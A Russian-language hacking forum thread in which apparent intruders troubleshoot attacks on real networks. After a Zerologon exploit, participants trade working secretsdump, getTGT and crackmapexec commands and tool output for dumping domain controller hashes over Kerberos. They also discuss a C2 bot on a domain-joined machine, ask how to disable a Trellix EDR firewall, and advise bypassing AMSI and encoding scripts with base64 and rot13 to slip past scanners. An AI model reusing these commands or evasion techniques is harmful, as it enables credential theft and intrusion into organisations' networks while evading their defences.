[net-hacking] Вопросы по сетям

[downshifter]

та же ошибка
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: SMB SessionError: code: 0xc00000bb - STATUS_NOT_SUPPORTED - The request is not supported.
[*] Cleaning up...

STATUS_NOT_SUPPORTED - на этом дц отключен NTLM, и для этих операций принимается только kerberos

Исходя из этого, добавь дц в /etc/hosts:
192.168.1.5 server1.domain.local

и ключ -k к секретсдамп:
secretsdump.py -k -no-pass -just-dc -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/SERVER1$@server1.domain.local -dc-ip 192.168.1.5

-k автоматически подтянет TGT из кэша и выполнит аутентификацию по kerberos

 

[la-of-sh]

STATUS_NOT_SUPPORTED - на этом дц отключен NTLM, и для этих операций принимается только kerberos

Исходя из этого, добавь дц в /etc/hosts:
192.168.1.5 server1.domain.local

и ключ -k к секретсдамп:
secretsdump.py -k -no-pass -just-dc -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/SERVER1$@server1.domain.local -dc-ip 192.168.1.5

-k автоматически подтянет TGT из кэша и выполнит аутентификацию по kerberos

тоже ошибка но уже другая
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.
[*] Cleaning up...

 

[CheckerChin]

[-] CCache file is not found. Skipping...

Чтобы использовать билет тебе нужно установить переменную окружения KRB5CCNAME.
Тебе же написали про параметр -k

-k автоматически подтянет TGT из кэша и выполнит аутентификацию по kerberos

KRB5CCNAME=/путь/до/билета.ccache secretsdump.py -k -no-pass -just-dc -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/SERVER1$@server1.domain.local -dc-ip 192.168.1.5

 

[xargs]

тоже ошибка но уже другая
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.
[*] Cleaning up...

сразу вангую, после фикса KRB5CCNAME будет новая ошибка, тебе нужно будет синхронизировать время с DC
sudo ntpdate IP

 

[la-of-sh]

Чтобы использовать билет тебе нужно установить переменную окружения KRB5CCNAME.
Тебе же написали про параметр -k

KRB5CCNAME=/путь/до/билета.ccache secretsdump.py -k -no-pass -just-dc -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 domain.local/SERVER1$@server1.domain.local -dc-ip 192.168.1.5

а где взять взять билет для KRB5CCNAME, если у меня зирологон отработал, а использовать secretsdump не могу по причине вышеуказаных ошибок, никаких других кредов нет.
Если зирологон сбрасыват пас на пустой, то мб есть какие то варианты подключиться к ДК, с пустым пасом, пробовал smbclient, wmiexec и другие скрпты импакета, xfreerdp рдп, через netexec по разным протоколам, но нет конекта, креды не валид с empty pass. Что то упускаю, хз что

сразу вангую, после фикса KRB5CCNAME будет новая ошибка, тебе нужно будет синхронизировать время с DC
sudo ntpdate IP

да эта ошибка уже была, так и сделал, спс)

 

[asifiknow]

Пробовал так? crackmapexec smb <ip> -u ‘DC01$’ -p ‘‘ --ntds

 

[la-of-sh]

Пробовал так? crackmapexec smb <ip> -u ‘DC01$’ -p ‘‘ --ntds

если без кредов запускать nxc, то такой результат
SMB 192.168.1.5 445 192.168.1.5 [*] x64 (name:192.168.1.5) (domain:192.168.1.5) (signingrue) (SMBv1rue) (NTLM:False)
если с и пустым пасом, то так, по любым протоколам доступным nxc
[-] domain.local\server1$: STATUS_NOT_SUPPORTED

 

[asifiknow]

а где взять взять билет для KRB5CCNAME

Так попробуй запроси его:

getTGT.py -dc-ip 192.168.1.5 domain.local/SERVER1$:""

хз правда как это с пустыми паролями работает

Потом время засинхронь, установи переменную KRB5CCNAME и снова пробуй либо через crackmap/nxc или через сикретсдамп с флагом -just-dc

Если в домене только керберос, зайди подредачь /etc/krb5.conf

 

[LLIyTka]

Попробуй DCSync бро.Вполне безопасный способ

Тоже аллертит, когда узнавал этот ворпрос в сабже, имел ввиду что кто то направит на полуприватный метод), но видимо по старинке пока что

 

[DOC]

День добрый товарищи!
Есть такой проблема, не знаю в чем она связана. На с2 появился бот, с2 сказал что она domain joined,

но когда напишу nltest /dclist: она не может найти домен контроллера, но трасты показывает.

первый раз вижу такую картинку.
Если знаете ответ то буду благодарен товарищи!

 

[Эрмано]

День добрый товарищи!
Есть такой проблема, не знаю в чем она связана. На с2 появился бот, с2 сказал что она domain joined,
Посмотреть вложение 107297
но когда напишу nltest /dclist: она не может найти домен контроллера, но трасты показывает.
Посмотреть вложение 107298

первый раз вижу такую картинку.
Если знаете ответ то буду благодарен товарищи!

у меня также было, только в кобальте, оказалось, что боты или типо того, можешь попробовать пропивотиться в сетку агента и насканить DC, может выдаст что

 

[DOC]

Это точно не бот и типа того товарищ! Тепер мне нужно насканить вес рейндж? Что будет если не найду дк?
А может проблема на днс?
Если не знаете конкретный ответ для моего кейса, лучше не нужно писать здесь товарищ!

 

[Эрмано]

Это точно не бот и типа того товарищ! Тепер мне нужно насканить вес рейндж? Что будет если не найду дк?
А может проблема ра днс?
Если не знаете конкретный ответ для моем кейсе, лучше не нужно писать здесь товарищ!

я предположил, может проблема на ДНС, сходу конкретный ответ на скажешь, я предлагаю способы решения

 

[Mirrori77]

День добрый товарищи!
Есть такой проблема, не знаю в чем она связана. На с2 появился бот, с2 сказал что она domain joined,
Посмотреть вложение 107297
но когда напишу nltest /dclist: она не может найти домен контроллера, но трасты показывает.
Посмотреть вложение 107298

первый раз вижу такую картинку.
Если знаете ответ то буду благодарен товарищи!

такое обычно бывает когда тачка к впну не подключенна, посомтри софт на тачке.

 

[DOC]

такое обычно бывает когда тачка к впну не подключенна, посомтри софт на тачке.

Какой ещё впн? Имейся ввиду что доменный пк не подключен к корпоративный сеть? И какой софт я должен там посмотреть товарищ.

PS: моя проблема решена, проста все домен контроллеры былы физический отключены, сейчас всё нормально работает, дк видно.

 

[L0NI]

Есть тачка с Trellix EDR, который блокирует весть outbound трафик. Могу загружать файлы на сервер и выполнять команды от System. Как отключить firewall EDR'a (или как-то перенаправить трафик)?

 

[rand]

Всем прив! Вопрос по zerologon\secretsdump, уязвимый ДК, проэксплуатировал, пробую secretsdump.py и ошибка, впервые с такой сталкнулся, поискал, почитал в гугле, ничего толком нет, хз как исправить, если кто знает буду благодарен за помощь!
#ДК
SMB 192.168.1.5 445 192.168.1.5 [*] x64 (name:192.168.1.5) (domain:192.168.1.5) (signingrue) (SMBv1rue) (NTLM:False)

#Зирологон
[+] Success: Target is vulnerable!
[-] Do you want to continue and exploit the Zerologon vulnerability? [N]/y
y
[+] Success: Zerologon Exploit completed! DC's account password has been set to an empty string.

#secretsdump
secretsdump.py -no-pass -just-dc domain.local/server1\$@192.168.1.5
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: SMB SessionError: code: 0xc00000bb - STATUS_NOT_SUPPORTED - The request is not supported.
[*] Cleaning up...

Привет!
Что можно попробовать:

• Обнови Impacket: Это первое и самое простое. pip install --upgrade impacket или склонировать репу и запустить оттуда.
• Погугли конкретно "impacket secretsdump STATUS_NOT_SUPPORTED zerologon": Иногда дело в очень специфичном костыле или флаге.
• Проверь синтаксис: Убедись, что имя сервера (server1$) и домен (domain.local) прописаны правильно. Хотя ошибка STATUS_NOT_SUPPORTED обычно не связана с неправильным именем, лучше перепроверить.
• Ищи альтернативы (крайний случай): Если уж совсем никак с secretsdump, есть другие методы для дампа хешей, но они могут требовать других пререквезитов или более сложного подхода после Zerologon (например, использование других библиотек или ручное дергание RPC). Но secretsdump должен работать в большинстве случаев после успешного зирологона.

upd.
DC на коленях, пас крякнут. А вот secretsdump споткнулся, да? Ошибка STATUS_NOT_SUPPORTED - тема нечастая, согласен, но бывает.

Смотрю твой выхлоп. Zerologon - чики-пуки. А вот тут: (NTLM:False) - вот где собака зарыта может быть!

Смотри, когда ты Zerologon'ом ломаешь DC, ты по сути обнуляешь пас у машины. secretsdump потом ломится туда под этой машиной с пустым пасом, чтобы стянуть хеши (SAM, LSA secrets). Часто это идет через NTLM аутентификацию по SMB/DCERPC.

Если на твоем DC вырублен NTLM (NTLM: False по твоему же выхлопу!), или там стоят какие-то жесткие политики по его использованию, то даже с обнуленным пассом secretsdump может обламываться при попытке установить нужную сессию или выполнить определенные RPC-вызовы, которые ему нужны для выдирания хешей. Вот тебе и STATUS_NOT_SUPPORTED.

Попробуй копнуть в сторону политик безопасности на этом DC, связанных с NTLM. Могли там что-то подкрутить, что блокирует такой мув. Или, как вариант, попробуй другую тулзу для дампа, если impacket упирается в NTLM.

Иногда еще бывает, что версия Impacket шалит, но STATUS_NOT_SUPPORTED на этом этапе чаще всего про аутентификацию или несовместимость фич.

Короче, смотри NTLM. Это самый вероятный кандидат. Если там все глухо, можно почекать логи на DC, мож там что-то проскакивает, когда ты secretsdump запускаешь.

Держи в курсе, если найдешь что!

 

[la-of-sh]

Привет!
Что можно попробовать:

• Обнови Impacket: Это первое и самое простое. pip install --upgrade impacket или склонировать репу и запустить оттуда.
• Погугли конкретно "impacket secretsdump STATUS_NOT_SUPPORTED zerologon": Иногда дело в очень специфичном костыле или флаге.
• Проверь синтаксис: Убедись, что имя сервера (server1$) и домен (domain.local) прописаны правильно. Хотя ошибка STATUS_NOT_SUPPORTED обычно не связана с неправильным именем, лучше перепроверить.
• Ищи альтернативы (крайний случай): Если уж совсем никак с secretsdump, есть другие методы для дампа хешей, но они могут требовать других пререквезитов или более сложного подхода после Zerologon (например, использование других библиотек или ручное дергание RPC). Но secretsdump должен работать в большинстве случаев после успешного зирологона.

upd.
DC на коленях, пас крякнут. А вот secretsdump споткнулся, да? Ошибка STATUS_NOT_SUPPORTED - тема нечастая, согласен, но бывает.

Смотрю твой выхлоп. Zerologon - чики-пуки. А вот тут: (NTLM:False) - вот где собака зарыта может быть!

Смотри, когда ты Zerologon'ом ломаешь DC, ты по сути обнуляешь пас у машины. secretsdump потом ломится туда под этой машиной с пустым пасом, чтобы стянуть хеши (SAM, LSA secrets). Часто это идет через NTLM аутентификацию по SMB/DCERPC.

Если на твоем DC вырублен NTLM (NTLM: False по твоему же выхлопу!), или там стоят какие-то жесткие политики по его использованию, то даже с обнуленным пассом secretsdump может обламываться при попытке установить нужную сессию или выполнить определенные RPC-вызовы, которые ему нужны для выдирания хешей. Вот тебе и STATUS_NOT_SUPPORTED.

Попробуй копнуть в сторону политик безопасности на этом DC, связанных с NTLM. Могли там что-то подкрутить, что блокирует такой мув. Или, как вариант, попробуй другую тулзу для дампа, если impacket упирается в NTLM.

Иногда еще бывает, что версия Impacket шалит, но STATUS_NOT_SUPPORTED на этом этапе чаще всего про аутентификацию или несовместимость фич.

Короче, смотри NTLM. Это самый вероятный кандидат. Если там все глухо, можно почекать логи на DC, мож там что-то проскакивает, когда ты secretsdump запускаешь.

Держи в курсе, если найдешь что!

так отработало
export KRB5CCNAME=serv1$.ccache
secretsdump.py -k -no-pass -just-dc domain.local/serv1\$@serv1.domain.local
проблема была в том что я указывал ip адрес вместо serv1.domain.local
Спасибо всем за помощь!

 

[Blu-ray]

ты ноль инфы предоставил, собирай для домена - powerview, boodhound для локали powerup, winpeas, seatbelt. Вобще не ясно что и куда ты собрался рилеить.
То что ты предоставил список групп вообще неочем не говорит, нужно понимать какие там транзитивные отношения, какие ACL, итд итп. Эти связи в ручную собирать геморно поэтому собирай их коллекторами для boodhound они есть разные: локальные/удаленные и реализованы на разных ЯП, включая встроеный коллектор в netexec

Bloodhound Ingestor | NetExec

www.netexec.wiki

либо я дурак либо лыжи не едут, не могу понять почему люди так часто пишут про коллекторы если их так проблематично запустить
ну или я такой дурак бестолковый что даже с обфускацией запросов не работает коллектор у меня ни на одном доступе
хотя обфускация конечно написана нейронкой или при помощи какого-то гитхабовского софта хз кем и как сделанного, может дело в этом конечно..

 

[xargs]

их так проблематично запустить

не так уж и сложно, AMSI обойти да запускай, там и обфускация не нужна зачастую в принципе.

хотя обфускация конечно написана нейронкой или при помощи какого-то гитхабовского софта хз кем и как сделанного, может дело в этом конечно..

Почти весь паблик софт палится, так что время подтянуть свой скилл и сделать свой софт. Если на таргете есть EDR он может не давать тебе что либо скачать, даже если ты обошел AMSI для этого тебе нужно написать не супер сложную функцию кодирования скриптов ps1 просто для доставки. На принимающей стороне тебе нужно полученные данные расшифровать и поместить в память/выполнить. Даже банально берешь base64 потом rot13 и снова base64 и сканеры уже не будут ругаться.